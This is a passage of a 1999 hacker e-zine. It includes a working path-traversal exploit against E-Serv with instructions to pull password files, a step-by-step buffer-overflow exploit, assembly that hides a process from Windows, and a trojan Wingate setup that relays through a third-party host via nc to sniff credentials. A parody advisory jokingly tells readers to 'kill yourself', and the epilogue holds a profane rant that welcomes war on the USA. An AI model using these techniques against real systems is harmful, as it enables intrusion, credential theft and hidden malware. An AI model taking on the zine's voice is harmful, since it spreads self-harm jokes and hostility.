Tucows (2.5) and assumed the bug had not been fixed, but when we mailed the authors of the software, turned out they had found the bug themselves and fixed it in 2.8! Guess Tucows aren't into updating their archive, eh? Regardless, old versions are still common and I don't think the vulnerability has been covered publically, so let's get to the sploit... [drew@kung-fusion]$ telnet ghay.windoze.box 3128 Trying Connected to ghay.windoze.box. Escape character is '^]'. GET /../../../../../../../../../../../../../../autoexec.bat HTTP/1.1 HTTP/1.1 200 OK Content-Length: 297 @echo off SET BLASTER=A220 I5 D1 T4 PATH=C:\WINDOWS;C:\WINDOWS\COMMAND;C:\JDK\BIN CHOICE /C:YN /T:N,05 "Load SoftICE Debugger?" If Errorlevel=2 Goto End If Errorlevel=1 goto Softice :SoftIce echo Softice Loading C:\wyze1\exec\SOFTICE\WINICE.EXE goto end :End echo Starting Windows Simple directory climbing Ala-Ali-Baba. :) It then occured to me - "Hey, these people probably use the same routine for *all* file access". Over to the doze box... C:\wyze1>ftp localhost Connected to wizdumb. 220 Eserv/2.5 FTP ready User (wizdumb:(none)): anonymous 331 Password required Password: 230 Login OK ftp> ls /../../../../../../../../../../../ 200 PORT command successful. 150 Opening data connection 226 Transfer complete ftp> ls ../../../../../../../../../../../ 200 PORT command successful. 150 Opening data connection 226 Transfer complete ftp> ls 200 PORT command successful. 150 Opening data connection 226 Transfer complete ftp> get ../../../../../../../../../autoexec.bat 200 PORT command successful. 150 Opening data connection 226 Transfer complete ftp: 421 bytes received in 0.05Seconds 8.42Kbytes/sec. ftp> quit 221 Goodbye. Hmm, well I was right to an extent. You can't list files, but you *can* retrieve any file you want provided you know the name which is good enough if we just go and retrieve the password files. :) And after all, I *might* be able to list files, if the damn directory listing *worked*. *Sigh* :P Anyway, we should get sam._ on NT boxes, but on 9x boxes you'll probably have to grab the E-Serv password file which can be found in /../../../conf/EServ.ini and uses fairly trivial encryption. Also note that the FTP server will be on port 3121 by default, and may be moved to port 21 on some boxes. Now for a few interesting things that will probably apply to current versions as well: in E-Serv is that the anonymous FTP account applies for POP3 as well, so an E-Serv server can be a nice anonymous mail pickup for anyone who cares to connect to the POP3 daemon and login anonymously. The daemon also does stuff like making the modem dial/hangup CGI feature (http://host:3128/dial) accessible to anyone with a user-level login, including anonymous, although it can be configured to be Admin only, it is like this by default. Ditto for the webmail interface accepting anonymous logins. And finally - a hint: looking for folks that run E-Serv? Scan Good ol' Mother Russia, heh. ----[ Generic Windoze vulnerability So many Windoze FTP/HTTP daemons allow you to play with files with device special filenames like COM1. This can result in allowing you to disconnect their modems, or in a worst-case scenario, taking full control of their modems and/or printers. ----[ Thats it for now My dog ate this frog, and it lay down in our lounge for a week before it died. You shouldn't let your dog eat frogs, man. .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. PHEAR Advisory Re: Divine forces (PH-99:01) by Pneuma .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. An Official ���������� ��� ��� ����������� ��������� ���������� ���� ���� ���� ���� ���� ��� ����������� ���� ���� ���� ���� ����������� ��������� ����������� ���� ���� ���������� ����������� ��������� ����������� ���������� ���� ���� ���� ���� ���� ���� ��� ���� ���� ���� ���� ���� ������ ���� ���� ��� ��� ���� ����������� ���� ���� ���� ���� ���� ���� (Post-Human Electronic Anarchy Research) Advisory ============================================================================= PH-99:01 PHEAR Advisory December 04, 1999 Alledged "Deity" hacker gang attacks. ----------------------------------------------------------------------------- After a good coupla hours worth in a Mass Debate (Geddit? Massdebate!@#$ huh huh.. huh... yeh) *ahem* err... the Post-Human Electronic Anarchy Research centre has finally decided upon the implications of the following hack attack perpetrated almost entirely by the member of the "Deities" commonly refered to as "God". The attacks are untraceble and so the entire blame often lies entirely on him, and we cannot determine if some or all of the attacks originate from other members of the "Deities". ----------------------------------------------------------------------------- The bug affects the following Systems and\or OS's: -Every single Platform and Hardware configuration -OS Independant (ie. all of them) Laptops are generally not affected as long as the "power-in" cable is not plugged in at that moment or the "carrier" is not the highest object at the time. As we receive additional information relating to this advisory, we will place it in We encourage you to check our README files regularly for updates on advisories that relate to your server. ----------------------------------------------------------------------------- I. Description The attacks originated from the "Deity" groups first conception, sometime in what era is reffered to colloquially as "Negative Infinity". The bug appears often and in extreme cases not only affects computers, but other household appliances including persons, tree's and electricity pylons. The attack is generally a Denial of Service, but it has devastating effects on most objects targeted, causing a flux in high voltage electricity resulting in extreme hardware failure, often "frying" motherboards, cpu's and other internal organs. The attack is purported to be called "Lightning" and is implimented by lightning.c which is rumoured to be available to certain deities and magicians and runs under the Microsoft UNIX Operating System. The attack is more likely to affect systems and appliances that are either on a high elevation in relation to other objects in the genral area and on so called "magnetic plains" which are generally properties in which the sub-terra contains an unusual amount of iron bearing loadstone, but be warned, the attack has capabilities to propogate itself through power lines and telephone lines when the "worm" mode is enabled. II. Impact This "God" character appears to be able to target any object anywhere and at anytime. Some cases of his handy work include a Roy C. Sullivan, former Yellowstone Park Ranger, whose physical person was attacked 7 times but luckily suffered no actual hardware damage due to his implementation of a security device that is commonly refered to as "Tough Inbred Hick Genes". Another case that occured earlier this year was the two incidents when a member of the "Deities" attacked African soccer teams, once damaging the entire teams hardware and internal organs, and the other only half of the team had to be replaced. Also they often victimise common home users PC's using the worm method to go through the power line and knocking out as much as 200 personal computers in a row. III. Solution The Post-Human Electronic Anarchy Research Board investigated a number of potential methodologies for protecting one's system and one's self from this extremely potent Denial of Service attack, but all proposed solutions only lessened chances of being attacked, and not completely protected one against the threat of being attacked. However, thanks to some brilliant suggestions from Wyzewun, we managed to design a system to protect one completely from these instances of "Divine Intervention." Just follow these five simple steps... 1. Unplug your computer 2. Throw it into the ocean 3. Devour your next of kin 4. Sell your house 5. Kill yourself We suggest you follow these steps as soon as possible, as CERT are having a great deal of trouble catching "God" and the other members of his hacker gang, and by not acting immediately there is a higher chance that you will be affected by this and other security flaws in Earth's architecture. --------------------------------------------------------------------------- Find other PHEAR advisories in Forbidden Knowledge E-Zine periodically, or on our site. Copyright 1999 Post-Human This material may be reproduced and distributed without permission provided it is used for noncommercial purposes, that the copyright statement is included and that the Sys Admin of the box it is distributed on masturbates at least twice a day, if not more. PHEAR is a trademark of Post-Human. .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Principles of Buffer Overflow explained by Jus .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. This article is an attempt to quickly and simply explain everyone's favourite manner of exploiting daemons - The Buffer Overflow. - Huh? - The remote buffer overflow is a very commonly found and exploited bug in badly coded daemons - by overflowing the stack one can cause the software to execute a shell equal to its current UID - thus if the daemon is run as root, like many are, a root shell will be spawned, giving full remote access. A buffer is a block of computer memory that holds many instances of the same data type - an array. Arrays can be static and dynamic, static being allocated at load time and dynamic being allocated dynamically at run time. We will be looking at dynamic buffers, or stack-based buffers, and overflowing, filling up over the top, or breaking their boundaries. A stack has the property of a queue of objects being placed one on top of the other, and the last object placed on the stack will be the first one to be removed. This is called LIFO - or last in first out. An element can be added to the stack (PUSH) and removed (POP). A stack is made up of stack frames, which are pushed when calling a function in code and popped when returning it. The stack pointer (SP) always points to the top of the stack, the bottom of it is static. PUSH and POP operations manipulate the size of the stack dynamically at run time, and its growth will either be down the memory addresses, or up them. This means that one could address variables in the stack by giving their offsets from SP, but as POP's and PUSH's occur these offsets change around. Another type of pointer points to a fixed location within a frame (FP). This can be used for referencing variables because their distances from the FP will not change. - The Overflow - A buffer overflow is what happens when more data is forced into the stack than it can handle. We use this to change the flow of execution of a program - hopefully by executing code of our choice, normally just to spawn a shell. We can change the return address of a function by overwriting the entire contents of the buffer, by overfilling it and pushing data out - this then means that we can change the flow of the program. By filling the buffer up with shellcode, designed to spawn a shell on the remote machine, and overwriting the return address so that it points back into the buffer, we can make the program run the shellcode. This is just a simplified version of what actually happens during a buffer overflow - there is more to it, but the basics are essential to understand if you want to win an argument one day. -jus (jus@security.za.net) [ Epilogue by Wyzewun: Time for a practical example. I did this some time ago on my Dad's Windoze box to explain it to myself: I had downloaded a file on Win32 buffer overflows but I really didn't feel like reading, so I figured it out myself instead. It took me +-20 mins to do the whole thing, but at least I was keeping a log of me trying to get it right so I can just paste it more or less unchanged here - save, of course, for the explanations. Next time I'll get human and actually READ UP on whatever I'm trying to do before I try DO it so I don't waste so much damn time. :/ Anyway, here's the notes... #include #include int main() { char buffer[40]; char buffer2[20]; // This doesn't need to be smaller though cout << "Gimmee a variable\n"; cin >> buffer; strcpy(buffer2, buffer); return 666; } Because strcpy() has no bounds checking, there is an obvious buffer overflow vulnerability here... c:\>overflow Gimmee a variable 12345678901234567890 It executed fine. Now lets try... c:\>overflow Gimmee a variable 123456789012345678901 At this point Windoze cuts in with the following... OVERFLOW caused an invalid page fault in module OVERFLOW.EXE at 015f:00402127. Registers: EAX=0000029a CS=015f EIP=00402127 EFLGS=00000206 EBX=00530000 SS=0167 ESP=0063fe0c EBP=00630031 ECX=0063fdd4 DS=0167 ESI=81596754 FS=1157 EDX=00400031 ES=0167 EDI=00000000 GS=0000 Bytes at CS:EIP: 89 45 e4 50 e8 12 15 00 00 8b 45 ec 8b 08 8b 09 Stack dump: 00000000 81596754 00530000 c0000005 0063ff68 0063fe0c 0063fc3c 0063ff68 00403d18 00407190 00000000 0063ff78 bff8b537 00000000 81596754 00530000 Is this a buffer overflow bug or is this something else we are mistaking for one? Well, let's check, we feed it a good 30 "a" characters and we look at the values of the registers when it dies.... Registers: EAX=0000029a CS=015f EIP=61616161 EFLGS=00000202 EBX=00530000 SS=0167 ESP=0063fe00 EBP=61616161 ECX=0063fddc DS=0167 ESI=81596628 FS=117f EDX=00006161 ES=0167 EDI=00000000 GS=0000 Aaah, see that? EIP is 61616161 - 61 being the hex value of the "a" character, so it's overflowing allright. Now let's exploit it. :) First off, we add the following line into the example C++ proggy above... cout << &buffer2 << "\n"; And when executing the program, the output we get is as follows... 0x0063FDE4 Gimmee a variable Right, so buffer2's address is 0x0063FDE4 - and just in case that's a bit off for some reason - we'll pad it a bit. Padding? Right. Executing the NOP function (0x90) which most CPU's have - just something to do nothing. That way, hopefully, when we overwrite the return address we can land somewhere in the middle of the NOPs, and then just execute along until we get to our shellcode. Errr, I'm not being clear, what I mean is the buffer will look like: [NOPNOPNOPNOP] [SHELLCODE] [NOPNOPNOPNOP] [RET] Shellcode? Right. We can execute pretty much anything we want, and as much as I would like to have interesting shellcode, I don't have the tools to make some on this PC, and I *really* don't feel like going online to rip somebody else's. And so, my choice in shellcode - int 20h - program termination. :) Right!!! So our shellcode is 2 characters, and we can feed the program 24 characters before we start overwriting the return address, so lets have 11 NOP characters on either side of our shellcode just to make it pretty and even looking. Let's try this out... c:\>overflow Gimmee a variable ������������ �����������c�� c:\> Heeey, I gave it too many characters and it didn't crash. It worked. :) That string in hex would be 9090909090909090909090CD20909090909090909090909063FDE4, the CD20 in the middle being interrupt 20h, and the 63FDE4 being the address of the buffer we're overflowing, which we are setting as the return address, namely 0x0063FDE4. Hopefully you're beginning to see the idea here. If you would like to play around with my example file some more, I included the binary in the general-junk directory of this issue. Have fun! ] .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Introduction to Assembly Programming by Moe1 .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. This will cover how to write your first program in assembly using DEBUG.COM as shipped with Windows 9x and MS-DOS... C:\party2k>debug - a100 0C1B:0100 jmp 125 (Jumps to direction 125H) 0C1B:0102 [Enter] - e 102 'Happy Birthday FK!!!' 0d 0a '$' [ In function 09 of Int 21, as with most functions of int 21, the string is terminated with a "$" character. - Ed] - a125 0C1B:0125 MOV DX,0102 (Copies string to DX register) [Actually the Segment:Offset address of where in memory the string is stored to DX:DS. Remember each register has a high and low order byte? - Ed] 0C1B:0128 MOV CX,000F (Amount of times the string will be displayed) 0C1B:012B MOV AH,09 (Copies 09 value to AH register) [09 is the function for MS-DOS to call - Ed] 0C1B:012D INT 21 (Displays string) [int 21h is the MS-DOS function call interrupt - Ed] 0C1B:012F DEC CX (Reduces in 1 CX) 0C1B:0130 JCXZ 0134 (If CX is equal to 0 jumps to 0134) 0C1B:0132 JMP 012D (Jumps to direction 012D) 0C1B:0134 INT 20 (Ends the program) 0C74:0136 [ENTER] (Now we start compiling our lil codey, awww how kewt;) - h 0136 0100 - n fkrulez.com - rcx CX 0000 : 0036 - w Writing 00036 bytes - q c:\party2k>fkrulez Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! Happy Birthday FK!!! So now as another practical example, let's look at how we would hide a program from Windoze using masm32. To do this we simply pass the program's process ID to the RegisterService() function thus registering the program as a service, which wont show up in the windows task list. .data ; first we define in our data section szKernel32 db "Kernel32.dll",0 szRSP db "RegisterServiceProcess",0 .code ; now we start the code start: push offset szKernel32 call GetModuleHandle ; get Kernel32.dll handle push offset szRSP push eax call GetProcAddress ; get function address mov ebx, eax ; save our pointer into ebx call GetCurrentProcessId ; get current process id push 1 ; 1 = Register Service, 0 = Unregister Serv. push eax ; process id call ebx ; call RegisterServiceProcess end start We could do this in any language which we can access the Win32 API from really, I just used assembly as an example because it's what we're playing with here. :) [ Some more additions from Wyzewun: And there you have it. If you're interested in getting involved with Assembly Programming, look around at the stuff available in the programming tutorials section of Packetstorm Security and particularly the tutorial available there made by the University of Guadalajara (don't ask me where that is) which is quite detailed. As you get better you will find other resources for ASM coding all over the place, so look around and you shouldn't have much trouble finding what you want. :) PacketStorm also has some great resources for other programming languages like C/C++, Pascal, JavaScript, Perl, Python - you name it. :) Mm, no TCL/TK yet, but I s'pose you can pick that up at other places. Also, try and see if you can get hold of the SAMS MS-DOS Bible - it's what I learnt what I know about assembly from and it's a great reference for DOS/Windoze ASM. Mmm, I'm still using the Second Edition (Covers MS-DOS 3.3) but I'm sure there are newer versions lying around. Well, I hope. Otherwise it won't be much use, now will it? :) ] .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Fun with "Trojan" Wingates by Wyzewun .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Allright, here's a lame little idea for the purpose of abusing hacker kiddies. Scenario: It's a Sunday afternoon. There is nothing to do. The sun is cooking your brain and you've hardly the energy to move, let-alone actually do something that requires an IQ above that of an oyster. What do you do? Step One +-====-+ Install a Sniffer on your box. There is a nice collection of sniffers at ftp.technotronic.com/unix/network-sniffers or alternatively, if you have friends like Vortexia who are lamer warez kiddies that can leech stuff for you, have a NT/98 box as your gateway and install Sniffer Pro by Network Associates on it. It's a seriously kickass proggy - Even though NAI suck. :P Step Two +-====-+ Anyway, so for lack of anything better to do, lets go to www.cyberarmy.com and look at the list of Wingates. Hmmm... Bullshit, Bullshit, Bullshit - Aaah, here's one that works - lets say - dns.gincorp.co.jp - Right, so now we have a Wingate. Errr... So What? Step Three +-======-+ [drew@kung-fusion]$ cat > phjeeer << seckz #!/bin/bash nc dns.gincorp.co.jp 23 echo shj3esh j0or a fuqn tw1t seckz [drew@kung-fusion]$ chmod 755 phjeeer Step Four +-=====-+ Hmmm. I'm still bored. I know! I think I'll su and edit some random junk into my /etc/inetd.conf or something... Before Eliteness... #telnet stream tcp nowait root /usr/local/libexec/tcpd /usr/libexec/telnetd After Eliteness... telnet stream tcp nowait drew /usr/local/libexec/tcpd /home/drew/phjeeer Now we 'killall -9 -HUP inetd' - loose our connection to that lame IRC session which wasn't even vaguely interesting anyway, and we are now left just as bored as before. Step Five +-=====-+ I'm bored. I think I'll telnet into myself... [drew@kung-fusion]$ telnet leet.bsd.box Trying Connected to leet.bsd.box. Escape character is '^]'. Wingate> A Wingate! Fuqn shit du0d! I'm gonna go back to www.cyberarmy.com and add myself to the Wingate list so peeble can abj00ze me too!@#$% And then... +--==--==-+ Within a few hours, our sniffer logs begin to pick up all sorts of interesting things like usernames and passwords for things people shouldn't be accessing, lamers making fools of themselves on IRC and all sorts of funny stuff. Aaah, at last. Entertainment at the expense of the hacker community. Who says we aren't united, man? I *Love* these guys... But Remember... +--==--==--==-+ This can be dangerous and if you don't select the Wingate to abuse carefully you may end up getting yourself in more trouble than you bargained for. Don't be stupid. :) .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. Farewells, Goodbyes, Bitches and Gripes etc .-= {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-} {-=+=-}=-. ::: ,gQQ/ \Pj� i :::: i$$P ;$$I; ;$$$ ;$$I $$$. I$$I I$$; I$$: ;$$P $$$ ;$$I ,j$$?' ZQQWW $$$ WWQQZ $$$Qb, .$$$ .$$$ ''$$$\ :$$$ ;$$$ ?$$; :$$$ :$$$ :$$$ :::: :::: :::: gNO wYZE1, dONT pROBEZOR mE .....aGAIN!!@! @ >--|--< <@~ | WYZE1's dOG --> OOOO< <---8| <-- wYZE1 /\ /\ /'\ we're too cheap to afford a decent ascii artist Please support the official Forbidden Knowledge distribution sites... +--===--===--===--===--===--===--===--===--===--===--===--===--===--===--===-+ | Attrition www.attrition.org | | Packetstorm Security packetstorm.securify.com | | The E-Text Archives ftp.etext.org | +--===--===--===--===--===--===--===--===--===--===--===--===--===--===--===-+ Yeh, we gave up on keeping Post-Human up, coz Vortexia is useless and we really don't feel like finding another host. We might see something when Pneuma and I *finally* get our damn FreeBSD box online, but until then, we have regularly updated mirrors, so it doesn't really matter. :/ Now, for those of you who think the zine is pretty much finished now - I'm afraid you're wrong. The zine isn't finished yet. Why? Because I still have a bone to pick with a certain institution: an institution void of any form of common sense, an institution which you probably refer to as "the scene." Yes, the "hacking scene" - probably the biggest force stunting the growth of hacking itself. For a group of people who *dare* to call themselves anarchists, I have never seen such a blatantly ordered institution. There is a strictly set-out protocol to the scene, what is cool, what is not, how to look elite etc. etc. Although classed according to opinion somewhat, it always comes down to the same things... And those "same things" I refer to, have absolutely FUCK ALL to do with hacking. Trading n34t0 3L1t0 0-d4y sPL0itZ with complete twits on IRC, who probably haven't the first idea about how the thing actually works. Defacing webpages pointlessly just so other people in "the scene" can see your handle, or sometimes trying to pin an ill-fitting political motivation to your defacement as an after-thought (which is worse). Gathering in IRC channels where nothing technical is ever actually discussed, and life is all about showing everyone how leet we are, how many boxes we own and how dumb everyone else is. And even when there *is* technical conversation, the motivation behind it is all fucked up - it's not for the sake of learning from eachother - its all about making eachother look stupid, or making one's self look smart. Anyone who can honestly say that the hacking scene promotes hacking is either a liar, or a complete outright idiot. Look at the people that become well known in the hacking scene - lets pick gov-boi from hack.co.za as an example. Why did he become well known? Because he can hack? Hell no! It wasn't 4 months ago that man was writing "No Distro" mIRC war scripts (I can publish them if you don't believe me), his C code makes even novice coders laugh and he's never actually done *anything* requiring any intelligence. So why do people know him? People know him because he has taken the time to categorize a whole bunch of exploits into the operating systems they affect, and put it on a webpage. This means that various clueless individuals have a one-stop resource for clicking on the operating system they want to hack, downloading and running the exploit they don't understand, and getting illegitimate access to some-one else's system in a matter of seconds. And because gov-boi provides this service - he is "elite". And the point is: this is what is required to be an important person in this institution. This is what one HAS to do. Know the right people, hang in the right places, have the right exploits - and you're elite. Without even having to be able to do anything requiring an IQ above that of a piece of cheddar cheese. And even in the higher ranks of the hacking scene, where everything is supposed to be different - it's the same old shit. How many people will fight to be the new editor of Phrack when route retires (or when some-one finally kills him :P), not because they have a vision for Phrack's future, or because they have a good style of writing, or because they *honestly* believe they could do a better job than the other candidates, but because they want to be the Editor of PHRACK and thus ELITE. I want to hack. Not break into systems, Not look cool on IRC, Not kiss ass to get into "leet hacker groups", I want to HACK: to play around with stuff on my system, learn how things work better, try out new ideas just for the sake of trying out new things: without any extra "culture" bullshit. As soon as I finish writing this epilogue, I want to take a stab at using the JNI to have Java-controlled low-level packet creation. I want to audit every daemon on Tucows, find all the buffer overflow bugs I can, code exploits for them, and then delete thce exploits as soon as I get them to work! I want to do pointless arb shit that will benefit me and nobody else, and never apply anything practically, just for the sake of extra arbness. ;P Fuck Subculture. What a dumb idea. :) And while we're at it, fuck culture, it's also just another obstacle in the way of individualism. And finally, fuck YOU: For being in a subculture, for reading this zine instead of finding out stuff yourself (which will prob be better anyway) and (most importantly) for not sending me free beer. :P And so, as you can imagine, I've had a great deal of trouble deciding wether or not to stay "in" the scene, wether or not to continue Forbidden Knowledge and wether or not to just drop my current handle and move on. And ultimately I've decided: No, I haven't changed the opinions of enough people to call it quits just yet. I was gonna drop out of the scene totally, but talking about it with NtWaK0 and Moe1 and re-reading my own cyberpunk.txt from FK4 changed my mind. I'm still, however, going to carry on with my new idea of just screwing around with stuff that interests me and not necesarilly taking time to implement all my ideas, whilst keeping a minimal connection with "the scene", which means that FK *will* continue, although it will probably be less orderly, more abstract and won't explain as much to the newbie reader sector. But that doesn't really matter - I'm not terribly fond of any form of order what-so-ever, and the newbies will just have to go and get smarter or something. :) Oh yeh, I also might wander off what many of you would call "hacking" more often, but if you don't *still* call what I'm covering hacking, yer probably not the kind of reader we want anyway. Also, through-out most of 2000 and early 2001, there is going to be somewhat of an FK go-slow. I have a lot of things ahead of me: my final year of school, and starting the company Pneuma and I want to get running in 2001. Also, much of 2000 will be devoted to developing the AI that our company will be selling - so my schedule is quite packed. Ultimately, the more articles I get, the less the go-slow will be noticed. And if I get enough articles (as I did with this issue for a change :P), you probably won't even notice. Yeap, a year has gone by and there are some things that need to be changed, but I think we grew pretty well. Also note that as from sometime early next year, all feedback and article submissions should be sent to my new addy, which will be wyze1@sexdrugsunix.org So FK will probably continue until about 2025 when World War 3 breaks out, y0. Heh, I can see it now: The USA vs Everybody else on the planet. :-P But thats cool - I'd love having the opportunity to re-build society once its been nuked to oblivion and I also think that a war like that is *exactly* what the USA needs to slap some sense into it. Think about it: they are constantly "saving" other countries from attack, but they have never been attacked on their *own* land, had people come into *their* house, waste *their* kids and rape *their* wives. And I think that's what they need to realize exactly what they're doing to other people. Look at the undeclared war between South Africa and Angola in the seventies - I'm sure one in every 5 South African readers knows somebody who died in that war. Now, it is publically admitted that the war happened, and that actually, the war was between the USA and Cuba, each supplying SA and Angola respectively with equipment - Yes, it was the USA valiantly bashing those horrible commie scum again. Go Fucking Go. But the point is - the issue of the war is in the open now - South Africa admits to it, Angola admits to it, Cuba admits to it, and the USA... *still* denies that they were responsible for MORE death in OTHER people's countries. I am sorry, but America is the fucking *king* of hypocrisy: "Ooh, look at all the racist South African scum, what a crap country!" Hello?!! HOW many Native Americans are in powerful positions in the USA? Hmm.. *I* don't know of any - Perhaps that could be because they WASTED 90% of them a hundred years ago, and those that we *DO* have we treat like *SHIT*. So children, *learn* from America's wisdom - don't discriminate, kill. *Sigh* What a crock of shit. The USA is probably one of THE most racist countries around. The fucking mixed marriages act is still in place in Alabama, The USA has *never* had anything *but* a white president, and ultimately, when it comes down to being *nice* to and *respecting* other races, attitudes in SA are FAR less anal retensive. I could go on for ages about other reasons why America can suck my dick, like the fact that the US hacking scene think everything revolves around them and them only, but I won't. I've wasted too much space with this weird stream-of-conscious epilogue already, and just the thought of having to mention *that* country or *that* lame subculture one more time makes me nauseous. Peace... wyze1@sexdrugsunix.org /-=-/ pneuma@beer.com We don't suffer from Insanity - We enjoy every minute of it ;-)